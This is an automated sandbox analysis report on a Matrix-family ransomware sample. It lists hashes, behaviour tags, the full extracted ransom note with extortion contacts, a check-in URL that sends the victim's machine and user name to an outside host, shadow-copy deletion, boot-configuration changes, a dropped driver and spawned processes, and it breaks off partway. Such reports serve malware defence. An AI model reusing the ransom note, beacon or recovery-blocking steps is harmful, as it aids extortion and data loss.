matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
141s
max time network
121s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
03-04-2024 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
SSDEEP

24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\106.0.5249.119\#KOK8_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 4DA22BE0A5EC54A8\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 4DA22BE0A5EC54A8\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 Iu9pxuPh\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exereg.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\sd\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Color\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\FreeCell\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Music\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Videos\Sample Videos\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
HTTP URL	4	http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=UEITMFAB\|Admin&sid=9Pf67WPtqzeCvwHy&phase=[ALL]4DA22BE0A5EC54A8
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Solitaire\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\skins\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\MF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\FreeCell\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6lxhv8bu.default-release\settings\main\ms-language-packs\browser\newtab\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ca@valencia\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\SetupMetrics\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Music\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\More Games\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P8PFHBEX\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Media Player\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Saved Games\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

5848 bcdedit.exe
5892 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 2640 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

D22bUU4y64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS D22bUU4y64.exe

pid	process
5848	bcdedit.exe
5892	bcdedit.exe

flow	pid	process
7	2640	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	D22bUU4y64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

D22bUU4y64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	D22bUU4y64.exe

Executes dropped EXE 64 IoCs

Processes:

NWiBQzcf.exeD22bUU4y.exeD22bUU4y64.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exeD22bUU4y.exe

pid	process
2732	NWiBQzcf.exe
3936	D22bUU4y.exe
4084	D22bUU4y64.exe
2132	D22bUU4y.exe
4404	D22bUU4y.exe
3032	D22bUU4y.exe
5136	D22bUU4y.exe
2168	D22bUU4y.exe
3672	D22bUU4y.exe
5348	D22bUU4y.exe
5384	D22bUU4y.exe
5492	D22bUU4y.exe
5512	D22bUU4y.exe
2952	D22bUU4y.exe
1720	D22bUU4y.exe
5200	D22bUU4y.exe
2356	D22bUU4y.exe
1472	D22bUU4y.exe
5580	D22bUU4y.exe
2200	D22bUU4y.exe
1688	D22bUU4y.exe
2476	D22bUU4y.exe
796	D22bUU4y.exe
2276	D22bUU4y.exe
2636	D22bUU4y.exe
2452	D22bUU4y.exe
2420	D22bUU4y.exe
2168	D22bUU4y.exe
1184	D22bUU4y.exe
3496	D22bUU4y.exe
3552	D22bUU4y.exe
1692	D22bUU4y.exe
1640	D22bUU4y.exe
2332	D22bUU4y.exe
2720	D22bUU4y.exe
5676	D22bUU4y.exe
5672	D22bUU4y.exe
3360	D22bUU4y.exe
3400	D22bUU4y.exe
4744	D22bUU4y.exe
4040	D22bUU4y.exe
4504	D22bUU4y.exe
4436	D22bUU4y.exe
5552	D22bUU4y.exe
5616	D22bUU4y.exe
5596	D22bUU4y.exe
3768	D22bUU4y.exe
3168	D22bUU4y.exe
3892	D22bUU4y.exe
4160	D22bUU4y.exe
5680	D22bUU4y.exe
5788	D22bUU4y.exe
5816	D22bUU4y.exe
5956	D22bUU4y.exe
4116	D22bUU4y.exe
4216	D22bUU4y.exe
4248	D22bUU4y.exe
4276	D22bUU4y.exe
4292	D22bUU4y.exe
2468	D22bUU4y.exe
1772	D22bUU4y.exe
4616	D22bUU4y.exe
5900	D22bUU4y.exe
4792	D22bUU4y.exe

Loads dropped DLL 64 IoCs

Processes:

